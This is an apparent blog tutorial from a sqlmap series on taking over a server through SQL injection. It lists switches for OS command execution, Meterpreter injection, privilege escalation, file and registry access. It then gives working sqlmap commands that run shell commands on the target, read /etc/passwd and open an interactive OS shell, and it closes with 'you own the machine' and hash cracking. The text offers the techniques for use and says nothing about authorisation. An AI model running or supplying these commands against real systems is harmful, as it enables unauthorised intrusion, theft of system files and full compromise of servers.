Advanced Exploitation with Sqlmap

We have learnt the basic exploitation of Sql Injection with the help of Sqlmap in our previous posts. But there is always a step further. In this post we will see most advanced exploitation with Sqlmap.

Once again 3 cheers to Kunal for helping me out for this post.

In our first post of Sqlmap, we have explained few basic options of Sqlmap. We will see some more.

Advanced Exploitation with Sqlmap

Whenever I meet people and talk about any vulnerability, my first and final ask remains the same what is most extreme thing we can do by exploiting that vulnerability. In the case of SQL Injection most of my peers don’t discuss beyond downloading or altering the database. Although we can go beyond it and take the control of the application completely with the help of shell. we can run the os-commands, upload a file, read an existing file and what not.

Advanced Options of Sqlmap

Operating System Level Access:
Switch Details
–os-cmd=OSCMD Run operating system level commands
–os-shell Invoke an interactive shell for communication
–os-pwn Injecting a Meterpreter shell or VNC
–os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
–os-bof Stored procedure buffer overflow exploitation
–priv-esc Database process’ user privilege escalation
–msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
File System Level Access:  

There are options used to access the underlying file system of the database server.

Switch Details
–file-read=RFILE Read a file from the back-end DBMS file system
–file-write=WFILE Write a local file on the back-end DBMS file system
–file-dest=DFILE Back-end DBMS absolute filepath to write to
Windows Registry Access: 
These options used to access the back-end database management system’s Windows registry.
Switch Details
–reg-read Read a Windows registry key value
–reg-add Write a Windows registry key value data
–reg-del Delete a Windows registry key value
–reg-key=REGKEY Windows registry key
–reg-value=REGVAL Windows registry key value
–reg-data=REGDATA Windows registry key value data
–reg-type=REGTYPE Windows registry key value type

We will see the practical implementation of few of the above ones. Lets start with running the below commands.

sqlmap -r sql.txt -p item --os-cmd=ls

sqlmap -r sql.txt -p item --os-cmd=ifconfig

Let’s see if we can read any file on the server.

sqlmap -r sql.txt -p item --read-file=/etc/passwd

We will read the files now.

This looks great ! What next, may be the shell.

sqlmap -r sql.txt -p item --os-shell

So You own the machine now. If you remember we have discussed regarding keeping the hash value for further attacks. Lets try that as well. As you can see you have got the crack of the hashes.

So, In this Sqlmap series we have learnt regarding basic exploit to advanced system takeover.

Do drop your valuable suggestions and feedback.

2 comments